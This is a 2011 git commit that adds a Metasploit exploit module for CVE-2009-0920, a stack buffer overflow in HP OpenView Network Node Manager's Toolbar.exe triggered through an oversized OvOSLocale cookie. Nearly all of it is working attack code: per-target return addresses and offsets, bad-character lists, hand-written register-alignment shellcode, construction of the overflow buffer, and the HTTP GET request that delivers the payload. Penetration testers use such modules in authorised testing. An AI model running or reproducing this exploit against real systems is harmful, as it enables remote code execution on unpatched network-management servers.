Add HP NNM ToolBar.exe exploit aganist the OvOSLocale cookie parameter

git-svn-id: file:///home/svn/framework3/trunk@13193 4d416f70-5f16-0410-b530-b9f4589650da
2011-07-16 05:14:33 +00:00 · 2011-07-16 05:14:33 +00:00 · 2e93ba06ba
parent 86b40e894b
commit 2e93ba06ba
1 changed files with 165 additions and 0 deletions
--- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb
+++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb
@ -0,0 +1,165 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0
+				and 7.53.  By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an
+				attacker may be able to execute arbitrary code.  Please note that this module only works
+				against	a specific build (ie. NNM 7.53_01195)
+			},
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'Author'         =>
+				[
+					'Oren Isacson', # original discovery
+					'juan vazquez', # metasploit module (7.0 target)
+					'sinn3r',       # 7.53_01195 target
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2009-0920' ],
+					[ 'OSVDB', '53242' ],
+					[ 'BID', '34294' ],
+					[ 'URL', 'http://www.coresecurity.com/content/openview-buffer-overflows']
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'          => 4000,
+					'BadChars'       => "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f\x3b\x2b",
+					'DisableNops'    => true, # no need
+					'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
+					'EncoderOptions' =>
+					{
+						'BufferRegister' => 'EDX'
+					}
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[
+						#Windows XP SP3
+						'HP OpenView Network Node Manager Release B.07.00',
+						{
+							'Ret' => 0x5A212147, # ovsnmp.dll call esp
+							'Offset' => 0xFC,  # until EIP
+							# Pointer to string with length < 0x100
+							# Avoid crash before vulnerable function returns
+							# And should work as a "NOP" since it will prepend shellcode
+							#'ReadAddress' => 0x5A03A225,# ov.dll
+							'ReadAddress' => 0x5A03A225,# ov.dll
+							'EDXAdjust' => 0x17,
+							# 0x8 => offset until "0x90" nops
+							# 0x4 => "0x90" nops
+							# 0x2 => len(push esp, pop edx)
+							# 0x3 => len(sub)
+							# 0x6 => len(add)
+						}
+					],
+					[
+						#Windows Server 2003
+						'HP OpenView Network Node Manager 7.53 Patch 01195',
+						{
+							'Eax'       => 0x5a456eac,   #Readable address for CMP BYTE PTR DS:[EAX],0
+							'EaxOffset' => 251,          #Offset to overwrite EAX
+							'Ret'       => 0x5A23377C,   #CALL EDI
+							'Max'       => 8000,         #Max buffer size
+						}
+					]
+				],
+			'DisclosureDate' => 'Jan 21 2009'))
+
+		register_options( [ Opt::RPORT(80) ], self.class )
+	end
+
+	def exploit
+
+		if target.name =~ /7\.53/
+
+			#EDX alignment for alphanumeric shellcode
+			#payload is in EDI first.  We exchange it with EDX, align EDX, and then
+			#jump to it.
+			align  = "\x87\xfa"      #xchg edi,edx
+			align << "\x80\xc2\x27"  #add dl,0x27
+			align << "\xff\xe2"      #jmp edx
+
+			#Add the alignment code to payload
+			p = align + payload.encoded
+
+			sploit  = 'en_US'
+			sploit << rand_text_alphanumeric(247)
+			sploit << [target.ret].pack('V*')
+			sploit << rand_text_alphanumeric(target['EaxOffset']-sploit.length+'en_US'.length)
+			sploit << [target['Eax']].pack('V*')
+			sploit << rand_text_alphanumeric(3200)
+			sploit << make_nops(100 - align.length)
+			sploit << align
+			sploit << p
+			sploit << rand_text_alphanumeric(target['Max']-sploit.length)
+
+		elsif target.name =~ /B\.07\.00/
+
+			edx = Rex::Arch::X86::EDX
+
+			sploit = "en_US"
+			sploit << rand_text_alphanumeric(target['Offset'] - "en_US".length, payload_badchars)
+			sploit << [target.ret].pack('V')
+			sploit << [target['ReadAddress']].pack('V')
+			sploit << "\x90\x90\x90\x90"
+			# Get in EDX a pointer to the shellcode start
+			sploit << "\x54" # push esp
+			sploit << "\x5A" # pop edx
+			sploit << Rex::Arch::X86.sub(-(target['EDXAdjust']), edx, payload_badchars, false, true)
+			sploit << "\x81\xc4\x48\xf4\xff\xff" # add esp, -3000
+			sploit << payload.encoded
+
+		end
+
+		#Send the malicious request to /OvCgi/ToolBar.exe
+		#If the buffer contains a badchar, NNM 7.53 will return a "400 Bad Request".
+		#If the exploit causes ToolBar.exe to crash, NNM returns "error in CGI Application"
+		send_request_raw({
+			'uri'     => "/OvCgi/Toolbar.exe",
+			'method'  => "GET",
+			'cookie'  => "OvOSLocale=" + sploit + "; OvAcceptLang=en-usa",
+		}, 20)
+
+		handler
+		disconnect
+	end
+
+end
+
+
+=begin
+NNM B.07.00's badchar set:
+00 0D 0A 20 3B 3D 2C 2B
+
+NNM 7.53_01195's badchar set:
+01 02 03 04 05 06 07 08 0a 0b 0c 0d 0e 0f 10 11    ................
+12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 7f       ...............
+3b = delimiter
+2b = gets converted to 0x2b
+=end